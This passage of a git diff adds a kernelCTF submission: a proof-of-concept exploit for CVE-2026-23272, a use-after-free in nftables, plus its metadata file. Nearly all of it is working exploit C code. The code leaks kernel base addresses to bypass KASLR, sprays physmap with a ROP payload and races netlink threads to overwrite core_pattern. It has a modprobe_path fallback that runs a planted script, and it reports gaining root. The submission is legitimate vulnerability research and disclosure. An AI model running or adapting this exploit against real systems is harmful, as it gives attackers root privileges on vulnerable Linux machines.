2>/dev/null\n" + "/bin/chmod 777 /tmp/flag 2>/dev/null\n"; + if (write(fd, s, strlen(s)) < 0) { /* ignore */ } + close(fd); + + fd = open("/tmp/dummy", O_CREAT|O_WRONLY|O_TRUNC, 0755); + if (fd < 0) return; + if (write(fd, "\xff\xff\xff\xff", 4) < 0) { /* ignore */ } + close(fd); +} + +// @step(name="Modprobe Fallback Trigger") +static int setup_try_modprobe(void) { + pid_t child = fork(); + if (child == 0) { + execl("/tmp/dummy", "/tmp/dummy", nullptr); + _exit(0); + } + if (child > 0) waitpid(child, nullptr, 0); + // @sleep(desc="wait for modprobe handler to execute payload 
script") + sleep_ms(MODPROBE_WAIT_MS); + int fd = open("/tmp/flag", O_RDONLY); + if (fd >= 0) { + char buf[4096]; + ssize_t n = read(fd, buf, sizeof(buf)-1); + close(fd); + if (n > 0) { + buf[n] = 0; + printf("[+] FLAG:\n%s\n", buf); + return 1; + } + } + return 0; +} + +/* ========== 3D candidate generation ========== */ +// @step(name="Candidate Generation via __init_begin Page Reclaim") +static void add_cand(uint64_t kb, uint64_t pb, uint64_t kva_off) { + if (num_cands3d >= MAX_CANDS) return; + cands3d[num_cands3d++] = {kb, pb, kva_off}; +} + +static int setup_generate_timed_init_candidates(uint64_t kb, uint64_t init_size) { +#ifdef __x86_64__ + uint64_t best_t[MAX_CANDS]; + uint64_t best_key[MAX_CANDS]; + uint64_t best_off[MAX_CANDS]; + for (int i = 0; i < MAX_CANDS; i++) { + best_t[i] = ~0ULL; + best_key[i] = ~0ULL; + best_off[i] = ~0ULL; + } + + auto mix64 = [](uint64_t x) -> uint64_t { + x ^= x >> 33; + x *= 0xff51afd7ed558ccdULL; + x ^= x >> 33; + x *= 0xc4ceb9fe1a85ec53ULL; + x ^= x >> 33; + return x; + }; + + for (uint64_t off = 0; off + 0x1000 <= init_size; off += 0x1000) { + uint64_t kva = kb + off_init_begin + off; + uint64_t t = time_prefetch(reinterpret_cast(kva), 8); + /* Tie-break equal timing samples to avoid always preferring low offsets. 
*/ + uint64_t key = mix64(off ^ 0x9e3779b97f4a7c15ULL); + + for (int i = 0; i < MAX_CANDS; i++) { + if (t > best_t[i]) continue; + if (t == best_t[i] && key >= best_key[i]) continue; + for (int j = MAX_CANDS - 1; j > i; j--) { + best_t[j] = best_t[j - 1]; + best_key[j] = best_key[j - 1]; + best_off[j] = best_off[j - 1]; + } + best_t[i] = t; + best_key[i] = key; + best_off[i] = off; + break; + } + } + + int added = 0; + for (int i = 0; i < MAX_CANDS; i++) { + if (best_off[i] == ~0ULL) continue; + add_cand(kb, 0, off_init_begin + best_off[i]); + if (num_cands3d >= MAX_CANDS) break; + added++; + } + + if (added > 0) { + printf("[*] __init timing-ranked candidates selected: %d\n", added); + for (int i = 0; i < MAX_CANDS && i < added; i++) { + printf("[*] rank %d: off=%#lx t=%lu\n", i + 1, + (unsigned long)best_off[i], (unsigned long)best_t[i]); + } + } + return added; +#else + (void)kb; + (void)init_size; + return 0; +#endif +} + +// @step(name="Generate __init_begin KVA Candidates") +static void setup_generate_candidates(void) { + uint64_t init_size = off_init_end - off_init_begin; + uint64_t kb = eb_kbases[0]; + printf("[*] __init candidates: up to %d offsets in kbase+%#lx..+%#lx\n", + MAX_CANDS, + (unsigned long)off_init_begin, (unsigned long)off_init_end); + + /* Under nokaslr, kbase is known; rank all __init pages by prefetch timing + * and try the fastest (most likely mapped/reclaimed) first. 
*/ + if (kernel_cmdline_has_token("nokaslr")) { + int added = setup_generate_timed_init_candidates(kb, init_size); + if (added > 0) { + printf("[*] generated %d timing-ranked candidates (budget=%ds, cycle=%ds)\n", + num_cands3d, RACE_SECONDS, CYCLE_SECONDS); + return; + } + printf("[*] timing-ranked selection empty, falling back to uniform offsets\n"); + } + + int ncands = MAX_CANDS; + uint64_t step = (init_size / static_cast(ncands)) & ~0xFFFULL; + if (step < 0x1000) step = 0x1000; + for (int i = 0; i < ncands && num_cands3d < MAX_CANDS; i++) { + uint64_t off = static_cast(i) * step; + if (off + off_init_begin >= off_init_end) off = init_size - 0x1000; + add_cand(kb, 0, off_init_begin + off); + } + + printf("[*] generated %d candidates (budget=%ds, cycle=%ds)\n", + num_cands3d, RACE_SECONDS, CYCLE_SECONDS); +} + +/* ========== exploit child (runs in namespace) ========== */ +static void on_alarm(int sig) { + (void)sig; + g_stop = 1; +} + +static int race_exploit_child(int cycle_secs) { + setup_ns(); + + struct nlsock ns = nl_open(); + if (ns.fd < 0) die("netlink"); + int fl = fcntl(ns.fd, F_GETFL, 0); + fcntl(ns.fd, F_SETFL, fl & ~O_NONBLOCK); + + int err = vuln_setup_nft(ns.fd, ns.pid); + if (err < 0) { + fprintf(stderr, "[-] nft setup: %d\n", err); + return 1; + } + printf("[+] nft objects ready\n"); + fcntl(ns.fd, F_SETFL, fl | O_NONBLOCK); + + /* Start race threads */ + g_stop = 0; + signal(SIGALRM, on_alarm); + signal(SIGTERM, on_alarm); + alarm(static_cast(cycle_secs + ALARM_GRACE_SEC)); + + #define N_THREADS 2 + pthread_barrier_t bar; + pthread_barrier_init(&bar, nullptr, N_THREADS); + + struct race_args ra = {}; + ra.writer_fd = ns.fd; + ra.writer_pid = ns.pid; + ra.bar = &bar; + ra.chain_kva = g_page_kva; + + pthread_t threads[N_THREADS]; + pthread_create(&threads[0], nullptr, race_writer_thread, &ra); + pthread_create(&threads[1], nullptr, race_packet_thread, &ra); + + printf("[*] racing for %ds...\n", cycle_secs); + while (!g_stop) { + // 
@sleep(desc="poll loop waiting for race cycle to complete") + sleep_ms(100); + } + + g_stop = 1; + for (int i = 0; i < N_THREADS; i++) + pthread_join(threads[i], nullptr); + close(ns.fd); + return 0; +} + +/* ========== memory sizing ========== */ +// @step(name="Auto-size Physmap Spray") +static void setup_auto_physmap_size(void) { + FILE *f = fopen("/proc/meminfo", "r"); + if (!f) return; + char line[256]; + while (fgets(line, sizeof(line), f)) { + unsigned long kb; + if (sscanf(line, "MemTotal: %lu kB", &kb) == 1) { + int avail = static_cast(kb / 1024); + int cap = avail * 2 / 5; + if (cap < 128) cap = 128; + if (cap > 2048) cap = 2048; + if (physmap_mb > cap) physmap_mb = cap; + printf("[*] RAM=%dMB, physmap capped to %dMB\n", avail, physmap_mb); + break; + } + } + fclose(f); +} + +/* ========== main exploit ========== */ +// @step(name="Main Exploit Loop") +int main(int argc, char **argv) { + setbuf(stdout, nullptr); + setbuf(stderr, nullptr); + + uint64_t cli_kb = 0, cli_pb = 0; + bool cli_kb_seen = false, cli_pb_seen = false; + + /* --vuln-trigger: trigger vulnerability for KASAN verification, + * skipping KASLR bypass, physmap spray, and full exploitation. */ + for (int i = 1; i < argc; i++) { + if (strcmp(argv[i], "--vuln-trigger") == 0) { + printf("=== --vuln-trigger: triggering err_set_full UAF for KASAN ===\n"); + g_page_kva = 0; + return race_exploit_child(VULN_TRIGGER_SECS); + } + uint64_t v = 0; + if (parse_u64_arg(argv[i], &v)) { + if (!cli_kb_seen) { + cli_kb = v; + cli_kb_seen = true; + } else if (!cli_pb_seen) { + cli_pb = v; + cli_pb_seen = true; + } + } + } + + printf("=== COS-113 err_set_full UAF exploit (kernelXDK) ===\n"); + + /* Initialize kernelXDK -- resolve offsets from target database */ + xdk_init_offsets(); + + setup_auto_physmap_size(); + + /* Preferred external leak input path: + * argv[1]=kbase (optionally argv[2]=phbase), as used by repro init.sh. */ + if (cli_kb_seen) { + /* init.sh can pass 0 when /proc/kallsyms is masked. 
Under nokaslr, + * use the canonical x86_64 base instead of falling back to EntryBleed. */ + if (cli_kb == 0 && kernel_cmdline_has_token("nokaslr")) { + cli_kb = 0xffffffff81000000ULL; + printf("[*] argv kbase was 0; using nokaslr fallback %#lx\n", + (unsigned long)cli_kb); + } + + kbase = cli_kb; + phbase = cli_pb ? cli_pb : 0xffff888000000000ULL; + eb_kbases[0] = kbase; + eb_nkb = 1; + eb_phbases[0] = phbase; + eb_npb = 1; + printf("[+] using argv: kbase=%#lx phbase=%#lx\n", + (unsigned long)kbase, (unsigned long)phbase); + } else { + /* Check for environment-provided addresses (nokaslr local testing) */ + uint64_t env_kb = env_u64("KBASE"), env_pb = env_u64("PHYSBASE"); + if (env_kb && env_pb) { + kbase = env_kb; + phbase = env_pb; + eb_kbases[0] = kbase; + eb_nkb = 1; + eb_phbases[0] = phbase; + eb_npb = 1; + printf("[+] using env: kbase=%#lx phbase=%#lx\n", + (unsigned long)kbase, (unsigned long)phbase); + } else { + if (kernel_cmdline_has_token("nokaslr")) { + kbase = 0xffffffff81000000ULL; + phbase = 0xffff888000000000ULL; + eb_kbases[0] = kbase; + eb_nkb = 1; + eb_phbases[0] = phbase; + eb_npb = 1; + printf("[+] using nokaslr fallback: kbase=%#lx phbase=%#lx\n", + (unsigned long)kbase, (unsigned long)phbase); + } else { + /* Integrated direct leak path for CI/repro with KASLR enabled. 
*/ + uint64_t proc_kb = leak_kbase_proc_kallsyms(); + if (proc_kb) { + kbase = proc_kb; + phbase = 0xffff888000000000ULL; + eb_kbases[0] = kbase; + eb_nkb = 1; + eb_phbases[0] = phbase; + eb_npb = 1; + printf("[+] using /proc/kallsyms: kbase=%#lx phbase=%#lx\n", + (unsigned long)kbase, (unsigned long)phbase); + } else { + leak_entrybleed(); + if (!kbase || !phbase) { + fprintf(stderr, "[-] entrybleed failed completely\n"); + return 1; + } + } + } + } + } + printf("[+] primary kbase=%#lx phbase=%#lx\n", + (unsigned long)kbase, (unsigned long)phbase); + printf("[+] kbase candidates: %d, phbase candidates: %d\n", eb_nkb, eb_npb); + + setup_payload(); + spray_physmap(); + + /* Try to get exact KVA from pagemap (works on local QEMU, not on kctf) */ + uint64_t exact_kva = leak_physmap_kva(); + if (exact_kva) { + printf("[+] exact KVA from pagemap: %#lx\n", (unsigned long)exact_kva); + cands3d[0] = {kbase, 0, exact_kva - kbase}; + num_cands3d = 1; + } else { + setup_generate_candidates(); + } + + struct timespec race_start; + clock_gettime(CLOCK_MONOTONIC, &race_start); + + int won = 0; + uint64_t prev_kb = 0; + + for (int ci = 0; ci < num_cands3d && !won; ci++) { + /* Check total timeout */ + struct timespec now; + clock_gettime(CLOCK_MONOTONIC, &now); + long elapsed = now.tv_sec - race_start.tv_sec; + if (elapsed >= RACE_SECONDS) { + printf("[-] total timeout (%ds) reached at candidate %d/%d\n", + RACE_SECONDS, ci, num_cands3d); + break; + } + + /* Update globals for this candidate */ + kbase = cands3d[ci].kbase; + g_page_kva = kbase + cands3d[ci].kva_off; + + /* Print header when kbase changes */ + if (kbase != prev_kb) { + printf("\n[*] --- kbase=%#lx (init range %#lx-%#lx) ---\n", + (unsigned long)kbase, + (unsigned long)(kbase + off_init_begin), + (unsigned long)(kbase + off_init_end)); + prev_kb = kbase; + } + printf("[*] cand %d/%d: kva=%#lx (init+%#lx) [%lds]\n", + ci+1, num_cands3d, (unsigned long)g_page_kva, + (unsigned long)(cands3d[ci].kva_off - 
off_init_begin), elapsed); + + /* Refill physmap with ROP blob for current (kbase, kva) */ + rop_fill_physmap(); + + int cycle_secs = (num_cands3d == 1) ? RACE_SECONDS : CYCLE_SECONDS; + + pid_t child = fork(); + if (child < 0) die("fork"); + if (child == 0) _exit(race_exploit_child(cycle_secs)); + + /* Parent: poll core_pattern while child races */ + for (int t = 0; t < cycle_secs * 2 && !won; t++) { + // @sleep(desc="poll interval waiting for core_pattern overwrite") + sleep_ms(POLL_INTERVAL_MS); + if (setup_check_core_pattern()) { + printf("[+] GOT ROOT - core_pattern overwritten!\n"); + // @sleep(desc="grace period before triggering core dump") + sleep_ms(KILL_GRACE_MS); + setup_trigger_core_dump(); + printf("[*] waiting for core dump handler (dd -> ttyS0)...\n"); + // @sleep(desc="wait for core dump handler to write flag to serial") + sleep_ms(CORE_DUMP_WAIT_MS); + printf("[+] ROOT OUTPUT - flag should be on serial\n"); + int fd = open("/tmp/flag", O_RDONLY); + if (fd >= 0) { + char buf[4096]; + ssize_t n = read(fd, buf, sizeof(buf)-1); + close(fd); + if (n > 0) { + buf[n] = 0; + printf("[+] FLAG:\n%s\n", buf); + } + } + won = 1; + break; + } + int status; + if (waitpid(child, &status, WNOHANG) > 0) { + printf("[*] child exited early (status=%d sig=%d)\n", + WIFEXITED(status) ? WEXITSTATUS(status) : -1, + WIFSIGNALED(status) ? 
WTERMSIG(status) : 0); + child = 0; + break; + } + } + + if (child > 0) { + kill(child, SIGTERM); + // @sleep(desc="grace period for child to handle SIGTERM before SIGKILL") + sleep_ms(KILL_GRACE_MS); + kill(child, SIGKILL); + waitpid(child, nullptr, 0); + } + } + + /* Fallback: try modprobe_path (for local QEMU testing) */ + if (!won) { + printf("[*] trying modprobe_path fallback...\n"); + for (int i = 0; i < 5 && !won; i++) { + if (setup_try_modprobe()) { + won = 1; + break; + } + // @sleep(desc="delay between modprobe_path fallback retries") + sleep_ms(MODPROBE_RETRY_MS); + } + } + + if (won) { + printf("\n[+] SUCCESS\n"); + return 0; + } + printf("\n[-] exploit did not achieve root\n"); + return 1; +} diff --git a/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/target_db.kxdb b/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/target_db.kxdb new file mode 100644 index 000000000..b47d2547a Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/target_db.kxdb differ diff --git a/pocs/linux/kernelctf/CVE-2026-23272_cos/metadata.json b/pocs/linux/kernelctf/CVE-2026-23272_cos/metadata.json new file mode 100644 index 000000000..5b6c92128 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23272_cos/metadata.json @@ -0,0 +1,30 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": ["exp451"], + "vulnerability": { + "summary": "Use-after-free in nft_add_set_elem() err_set_full path due to freeing an RCU-published set element when insertion into a full set fails", + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=def602e498a4f951da95c95b1b8ce8ae68aa733a", + "cve": "CVE-2026-23272", + "affected_versions": [ + "4.9.33 - 6.18.16", + "6.19 - 6.19.6", + "7.0-rc1 - 7.0-rc2" + ], + "requirements": { + "attack_surface": ["userns"], + "capabilities": ["CAP_NET_ADMIN"], + "kernel_config": [ 
+        "CONFIG_NETFILTER",
+        "CONFIG_NF_TABLES",
+        "CONFIG_NF_TABLES_INET"
+      ]
+    }
+  },
+  "exploits": {
+    "cos-113-18244.521.98": {
+      "uses": ["userns"],
+      "requires_separate_kaslr_leak": true,
+      "stability_notes": "Probabilistic. Depends on __init_begin page reclaim and in-batch SLUB LIFO reclaim timing. Typically needs multiple candidate cycles (~20s each). Auto-retries through 13 candidates within a 260s budget."
+    }
+  }
+}
diff --git a/pocs/linux/kernelctf/CVE-2026-23272_cos/original.tar.gz b/pocs/linux/kernelctf/CVE-2026-23272_cos/original.tar.gz
new file mode 100644
index 000000000..9f759fa55
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23272_cos/original.tar.gz differ